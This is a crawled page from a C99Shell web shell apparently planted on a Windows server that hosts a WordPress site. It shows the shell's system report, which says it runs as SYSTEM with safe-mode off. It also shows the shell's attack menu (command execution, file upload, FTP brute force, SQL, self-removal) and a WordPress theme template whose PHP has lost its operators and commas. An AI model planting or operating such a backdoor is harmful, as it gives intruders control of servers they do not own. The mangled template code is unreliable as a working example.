!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\cumbreclima\wp-content\themes\patti\   drwxrwxrwx
Free 4.13 GB of 39.52 GB (10.45%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     single-portfolio.php (1.58 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php get_header(); ?>
    <?php
    
global $smof_data;
    
$portfolio_slide get_post_meta($post->ID,'dt_slider_repeat',true);
    
    
$portf_more_images get_post_meta($post->ID'dt_more_images_block'true);
    
?>

    <?php if (have_posts()) : while (have_posts()) : the_post(); ?>
    
    <?php get_template_part'includes/page-title' ); ?>
    
    <div class="centered-wrapper">    
        <section class="portfolio-single">
            <article id="post-<?php the_ID(); ?>" class="begin-content">

            <div class="clear"></div>

            <?php the_content(); ?>        
        
            </article>
        </section>
        
        <div class="clear"></div>
        
        <?php if(isset($smof_data['portfolio_author'])) { if($smof_data['portfolio_author'] =='1') { ?>
            <div class="double-separator"></div>
            <div class="author-bio">                            
                <?php echo get_avatarget_the_author_meta('user_email'), '70''' ); ?>
                <div class="authorp">
                    <h2><span><?php _e('Author: ''delicious'); ?></span><?php the_author_link(); ?></h2>
                    <p><?php the_author_meta('description'); ?></p>                            
                </div>
            </div>    
        
        <?php  } } ?>

    </div><!--end centered-wrapper-->

    <div class="portfolio-nav"> 
        <?php next_post_link('%link''<i class="fa fa-angle-left"></i>'); ?>
        <a href="<?php if((isset($smof_data['portfolio_back_link'])) && ($smof_data['portfolio_back_link'] !='')) { echo $smof_data['portfolio_back_link']; } else echo home_url(); ?>" class="close-portfolio external"><i class="fa fa-th"></i></a>
        <?php previous_post_link('%link''<i class="fa fa-angle-right"></i>'); ?>
    </div>    


    <?php endwhile; endif; ?>    

<?php get_footer(); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--